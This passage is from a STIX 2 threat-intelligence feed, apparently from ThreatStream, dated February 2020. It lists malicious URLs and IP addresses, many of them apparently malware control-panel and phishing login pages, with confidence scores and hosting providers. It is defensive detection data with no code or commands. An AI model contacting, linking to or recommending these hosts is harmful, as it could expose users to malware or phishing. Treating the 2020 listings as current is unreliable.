CyberCrime","id":"indicator--5139b761-30aa-48b8-a7f6-4d125117fd4d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-10T02:04:39.273Z","name":"mal_url: http://f0391247.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391247.xsph.ru/login']","type":"indicator","valid_from":"2020-02-10T02:04:39.273Z"} +{"created":"2020-02-11T02:05:59.738Z","description":"TS ID: 55306531291; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime","id":"indicator--8aed750b-7bc5-41be-956d-5c27ba956957","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-11T02:05:59.738Z","name":"mal_url: http://borrdrillling.com/benz-forlife/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://borrdrillling.com/benz-forlife/panel/admin.php']","type":"indicator","valid_from":"2020-02-11T02:05:59.738Z"} +{"created":"2020-02-11T02:06:33.437Z","description":"TS ID: 55306531295; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime","id":"indicator--939b7b32-9004-40e0-8c48-77b9452a0902","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-11T02:06:33.437Z","name":"mal_url: http://borrdrillling.com/fox/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://borrdrillling.com/fox/']","type":"indicator","valid_from":"2020-02-11T02:06:33.437Z"} +{"created":"2020-02-11T02:06:48.532Z","description":"TS ID: 55306531290; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime","id":"indicator--f2f9ebc5-814d-4ff2-9979-76264e15d743","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-11T02:06:48.532Z","name":"mal_url: http://borrdrillling.com/benz/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://borrdrillling.com/benz/panel/admin.php']","type":"indicator","valid_from":"2020-02-11T02:06:48.532Z"} +{"created":"2020-02-11T02:07:49.317Z","description":"TS ID: 55306531320; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--782c926c-e92f-451e-8aaf-dbe446b8abe4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-02-11T02:07:49.317Z","name":"mal_url: http://klickus.com/okye/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://klickus.com/okye/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-11T02:07:49.317Z"} +{"created":"2020-02-11T02:07:49.341Z","description":"TS ID: 55306531298; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--336d437c-cb0b-473c-b157-3edad63d3a65","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-02-11T02:07:49.341Z","name":"mal_url: http://klickus.com/gozie/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://klickus.com/gozie/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-11T02:07:49.341Z"} +{"created":"2020-02-12T02:02:34.926Z","description":"TS ID: 55309106417; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--1fff5727-69fd-4477-a610-3542e53642ae","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-12T02:02:34.926Z","name":"mal_url: http://alwaysdelivery.xyz/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://alwaysdelivery.xyz/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-12T02:02:34.926Z"} +{"created":"2020-02-12T02:03:19.477Z","description":"TS ID: 55309106235; iType: mal_url; State: active; Org: VoenTelecom nets; Source: CyberCrime","id":"indicator--8c3385b7-6ee5-4699-87c8-7a7b1da9b6aa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-49"],"modified":"2020-02-12T02:03:19.477Z","name":"mal_url: http://188.227.85.53/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://188.227.85.53/panel/admin.php']","type":"indicator","valid_from":"2020-02-12T02:03:19.477Z"} +{"created":"2020-02-13T02:02:41.467Z","description":"TS ID: 55311776075; iType: mal_ip; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime","id":"indicator--91ef9dde-3f0a-472c-b8ec-a1b9951acb50","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-13T02:02:41.467Z","name":"mal_ip: 111.90.142.42","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '111.90.142.42']","type":"indicator","valid_from":"2020-02-13T02:02:41.467Z"} +{"created":"2020-02-13T02:02:52.653Z","description":"TS ID: 55311776233; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--948a3e06-3481-4873-94e7-8ab068284aba","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-13T02:02:52.653Z","name":"mal_url: http://felicombo.club/Zebra/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://felicombo.club/Zebra/admin.php']","type":"indicator","valid_from":"2020-02-13T02:02:52.653Z"} +{"created":"2020-02-13T02:03:16.624Z","description":"TS ID: 55311776246; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime","id":"indicator--3b3faeec-4f78-41f2-acd8-13090336f058","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-13T02:03:16.624Z","name":"mal_url: http://pdocxoffice.com/Panel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pdocxoffice.com/Panel/login.php']","type":"indicator","valid_from":"2020-02-13T02:03:16.624Z"} +{"created":"2020-02-13T02:03:36.577Z","description":"TS ID: 55311776248; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--ae6ff4c4-73c1-473a-90cb-99f135240243","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-13T02:03:36.577Z","name":"mal_url: http://megaeditores.com/fgv/PHP/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://megaeditores.com/fgv/PHP/index.php']","type":"indicator","valid_from":"2020-02-13T02:03:36.577Z"} +{"created":"2020-02-13T02:03:38.86Z","description":"TS ID: 55311776237; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--104abde1-c4e9-45a2-85e1-525ea3bec752","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-23"],"modified":"2020-02-13T02:03:38.86Z","name":"mal_url: http://45.153.185.12/prUjRYcU2rqFpZqv/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.153.185.12/prUjRYcU2rqFpZqv/login.php']","type":"indicator","valid_from":"2020-02-13T02:03:38.86Z"} +{"created":"2020-02-20T04:06:53.787Z","description":"TS ID: 55316616622; iType: mal_url; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--57d0bd25-4211-4e2e-8a4e-31e38eeda90b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-20T04:06:53.787Z","name":"mal_url: http://hotlips.top/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://hotlips.top/login']","type":"indicator","valid_from":"2020-02-20T04:06:53.787Z"} +{"created":"2020-02-20T04:08:45.548Z","description":"TS ID: 55316617564; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--d11be9c2-b408-42a4-a4ad-0ede3c1709f0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-20T04:08:45.548Z","name":"mal_url: http://aflamdirectory.com/wp-content/ip/login/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://aflamdirectory.com/wp-content/ip/login/']","type":"indicator","valid_from":"2020-02-20T04:08:45.548Z"} +{"created":"2020-02-20T04:08:45.601Z","description":"TS ID: 55316617187; iType: mal_url; State: active; Org: Telenet Ltd.; Source: CyberCrime","id":"indicator--ed5ed1a3-8090-4db3-92cb-3b7b733fa28e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-20T04:08:45.601Z","name":"mal_url: http://ayoobtextlie.com/craks/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ayoobtextlie.com/craks/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T04:08:45.601Z"} +{"created":"2020-02-20T04:09:16.891Z","description":"TS ID: 55316616322; iType: mal_ip; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime","id":"indicator--6c201663-b1e4-483e-821b-0fe74aecc497","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-20T04:09:16.891Z","name":"mal_ip: 5.188.9.33","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '5.188.9.33']","type":"indicator","valid_from":"2020-02-20T04:09:16.891Z"} +{"created":"2020-02-20T04:11:00.455Z","description":"TS ID: 55316616996; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--8203935f-fb3f-418c-945d-40fca5ef088d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T04:11:00.455Z","name":"mal_url: http://mecharnise.ir/ca10/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mecharnise.ir/ca10/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T04:11:00.455Z"} +{"created":"2020-02-20T04:28:36.154Z","description":"TS ID: 55321824436; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--238f73e8-938d-4d08-9705-b1b669c129b2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-20T04:28:36.154Z","name":"mal_url: http://5.8.88.27/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.8.88.27/login']","type":"indicator","valid_from":"2020-02-20T04:28:36.154Z"} +{"created":"2020-02-20T04:28:36.172Z","description":"TS ID: 55321824399; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--6ff21635-ac08-4afe-b5e7-c18dfe320f0f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T04:28:36.172Z","name":"mal_url: http://23.247.102.18/4/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://23.247.102.18/4/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T04:28:36.172Z"} +{"created":"2020-02-20T04:28:36.19Z","description":"TS ID: 55321824397; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--9f55ff73-b6b6-476d-bb32-b9a7f8b16e93","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T04:28:36.19Z","name":"mal_url: http://23.247.102.18/6/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://23.247.102.18/6/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T04:28:36.19Z"} +{"created":"2020-02-20T04:30:25.248Z","description":"TS ID: 55321824409; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--4abbf2ea-6e46-48e8-b74d-1928c92e6277","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-20T04:30:25.248Z","name":"mal_url: http://f0400035.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0400035.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T04:30:25.248Z"} +{"created":"2020-02-20T04:31:26.488Z","description":"TS ID: 55321824418; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--8678d0a4-2b3c-4cea-a745-796f996e18bc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-20T04:31:26.488Z","name":"mal_ip: 217.8.117.22","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '217.8.117.22']","type":"indicator","valid_from":"2020-02-20T04:31:26.488Z"} +{"created":"2020-02-20T04:31:26.532Z","description":"TS ID: 55321824403; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--bfd713ad-3d94-441a-b6bc-135ce911b580","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T04:31:26.532Z","name":"mal_url: http://23.247.102.18/panel/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://23.247.102.18/panel/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T04:31:26.532Z"} +{"created":"2020-02-20T04:31:26.582Z","description":"TS ID: 55321824401; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--f43a4d56-b27f-41f0-917b-52358df31e13","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T04:31:26.582Z","name":"mal_url: http://23.247.102.18/2/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://23.247.102.18/2/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T04:31:26.582Z"} +{"created":"2020-02-20T04:32:16.603Z","description":"TS ID: 55321824432; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--36d62b8e-77db-4111-be17-d0a3e20bbd9d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-41"],"modified":"2020-02-20T04:32:16.603Z","name":"mal_ip: 5.8.88.35","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '5.8.88.35']","type":"indicator","valid_from":"2020-02-20T04:32:16.603Z"} +{"created":"2020-02-20T04:32:52.041Z","description":"TS ID: 55321824444; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--b6863ec6-1752-43b3-b748-ee8a29b6a52e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-20T04:32:52.041Z","name":"mal_ip: 2.57.91.231","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '2.57.91.231']","type":"indicator","valid_from":"2020-02-20T04:32:52.041Z"} +{"created":"2020-02-20T04:32:52.057Z","description":"TS ID: 55321824423; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--fb1aa473-4d9d-46a3-b053-ae7c051d0e14","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-20T04:32:52.057Z","name":"mal_url: http://lae9ac50.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lae9ac50.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-20T04:32:52.057Z"} +{"created":"2020-02-20T04:32:52.074Z","description":"TS ID: 55321824417; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--f4447d70-3217-4319-9b89-4439db608f67","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-20T04:32:52.074Z","name":"mal_url: http://ld01c555.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ld01c555.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-20T04:32:52.074Z"} +{"created":"2020-02-20T04:49:13.452Z","description":"TS ID: 55324942456; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime","id":"indicator--93e03851-428e-4e25-9fa6-17383426a6d7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-20T04:49:13.452Z","name":"mal_url: http://borrdrillling.com/psm91/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://borrdrillling.com/psm91/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T04:49:13.452Z"} +{"created":"2020-02-20T04:49:22.233Z","description":"TS ID: 55324942451; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--ddce3ac3-2e92-4c94-9537-acefcbfecfc0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-20T04:49:22.233Z","name":"mal_url: http://wtfshop.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://wtfshop.myjino.ru/login']","type":"indicator","valid_from":"2020-02-20T04:49:22.233Z"} +{"created":"2020-02-20T04:50:21.678Z","description":"TS ID: 55324942453; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--d4e1621e-ff57-4881-bf03-67f89c1db651","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-20T04:50:21.678Z","name":"mal_url: http://minecrafttusa1.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://minecrafttusa1.myjino.ru/login']","type":"indicator","valid_from":"2020-02-20T04:50:21.678Z"} +{"created":"2020-02-20T04:50:21.708Z","description":"TS ID: 55324942431; iType: mal_ip; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--99db47e4-6284-47db-a3bb-70dfcac899c2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-20"],"modified":"2020-02-20T04:50:21.708Z","name":"mal_ip: 141.8.194.74","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '141.8.194.74']","type":"indicator","valid_from":"2020-02-20T04:50:21.708Z"} +{"created":"2020-02-20T04:50:33.473Z","description":"TS ID: 55324942449; iType: mal_ip; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--75f014d9-2c40-4fa1-a05e-43521af4a944","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-36"],"modified":"2020-02-20T04:50:33.473Z","name":"mal_ip: 47.252.11.134","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '47.252.11.134']","type":"indicator","valid_from":"2020-02-20T04:50:33.473Z"} +{"created":"2020-02-20T04:51:08.292Z","description":"TS ID: 55324942438; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--e5ae9133-c459-4130-b2cc-6bfc3d1bba08","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-20T04:51:08.292Z","name":"mal_url: http://amazon-fr.fun/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://amazon-fr.fun/admin/']","type":"indicator","valid_from":"2020-02-20T04:51:08.292Z"} +{"created":"2020-02-20T05:16:07.933Z","description":"TS ID: 55328307473; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--19914258-5bed-4f35-8f57-f639b0d9c1a0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T05:16:07.933Z","name":"mal_url: http://5.8.88.68/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.8.88.68/login']","type":"indicator","valid_from":"2020-02-20T05:16:07.933Z"} +{"created":"2020-02-20T05:16:27.52Z","description":"TS ID: 55330801573; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--a1d0cc69-641e-4588-92f4-0ad9713860e1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-20T05:16:27.52Z","name":"mal_url: http://f0400017.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0400017.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T05:16:27.52Z"} +{"created":"2020-02-20T05:16:27.557Z","description":"TS ID: 55330801572; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--52371067-94be-4a79-b45d-8de115e81e86","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-02-20T05:16:27.557Z","name":"mal_url: http://f0391202.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391202.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T05:16:27.557Z"} +{"created":"2020-02-20T05:16:37.354Z","description":"TS ID: 55328307469; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--0e0682f9-a160-46c2-ba7f-ba9dc2858f7e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T05:16:37.354Z","name":"mal_url: http://ld7fa9c9.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ld7fa9c9.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-20T05:16:37.354Z"} +{"created":"2020-02-20T05:16:41.613Z","description":"TS ID: 55330801557; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--c7e63dd5-c41f-4fd4-bbaa-8b54a1a1a227","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-02-20T05:16:41.613Z","name":"mal_ip: 161.117.178.167","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '161.117.178.167']","type":"indicator","valid_from":"2020-02-20T05:16:41.613Z"} +{"created":"2020-02-20T05:16:57.739Z","description":"TS ID: 55328307494; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--9f847df6-9c88-4a03-b852-394fd8a77f58","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-20T05:16:57.739Z","name":"mal_url: http://referral-casino.club/1/stats/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://referral-casino.club/1/stats/admin.php']","type":"indicator","valid_from":"2020-02-20T05:16:57.739Z"} +{"created":"2020-02-20T05:16:57.764Z","description":"TS ID: 55328307481; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime","id":"indicator--479ea508-2ae1-4aea-825b-e83914fb8d53","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-20T05:16:57.764Z","name":"mal_url: http://brokenhead.xyz/Work5/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://brokenhead.xyz/Work5/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:16:57.764Z"} +{"created":"2020-02-20T05:16:57.791Z","description":"TS ID: 55328307476; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--051488db-6441-4ca9-9e5f-c8656e3b1d9f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-02-20T05:16:57.791Z","name":"mal_url: http://mediagift.vn/.ki/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mediagift.vn/.ki/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:16:57.791Z"} +{"created":"2020-02-20T05:17:10.129Z","description":"TS ID: 55328307464; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--d5a928aa-3237-4c44-93e8-f73eb20dc728","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-20T05:17:10.129Z","name":"mal_ip: 185.98.87.59","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.98.87.59']","type":"indicator","valid_from":"2020-02-20T05:17:10.129Z"} +{"created":"2020-02-20T05:18:20.205Z","description":"TS ID: 55330801629; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--db19cb4e-25ad-46d3-a944-6e53f62d230c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-20T05:18:20.205Z","name":"mal_url: http://liweff.eu/vla/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://liweff.eu/vla/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T05:18:20.205Z"} +{"created":"2020-02-20T05:18:20.412Z","description":"TS ID: 55328307485; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime","id":"indicator--438a519a-17ed-422b-a21d-0262b4b2fc0e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-20T05:18:20.412Z","name":"mal_url: http://brokenhead.xyz/Work2/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://brokenhead.xyz/Work2/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:18:20.412Z"} +{"created":"2020-02-20T05:18:22.703Z","description":"TS ID: 55330801601; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--7279d49d-39e4-42d1-8fb7-14ddb56d67d7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T05:18:22.703Z","name":"mal_url: http://castmart.ga/~zadmin/lmark/pop/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/lmark/pop/uMc.php']","type":"indicator","valid_from":"2020-02-20T05:18:22.703Z"} +{"created":"2020-02-20T05:18:31.965Z","description":"TS ID: 55328307489; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--70ae46d6-4f8c-4601-ac48-84848ca04719","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T05:18:31.965Z","name":"mal_url: http://158.69.39.138/file/panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://158.69.39.138/file/panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:18:31.965Z"} +{"created":"2020-02-20T05:18:31.986Z","description":"TS ID: 55328307482; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime","id":"indicator--11637bfb-fd5b-482b-83b0-ab8a49aa80e1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-20T05:18:31.986Z","name":"mal_url: http://brokenhead.xyz/Work6/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://brokenhead.xyz/Work6/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:18:31.986Z"} +{"created":"2020-02-20T05:18:33.111Z","description":"TS ID: 55330801593; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--b2cc241b-8f9a-494d-b842-74bc151bec7a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-20T05:18:33.111Z","name":"mal_url: 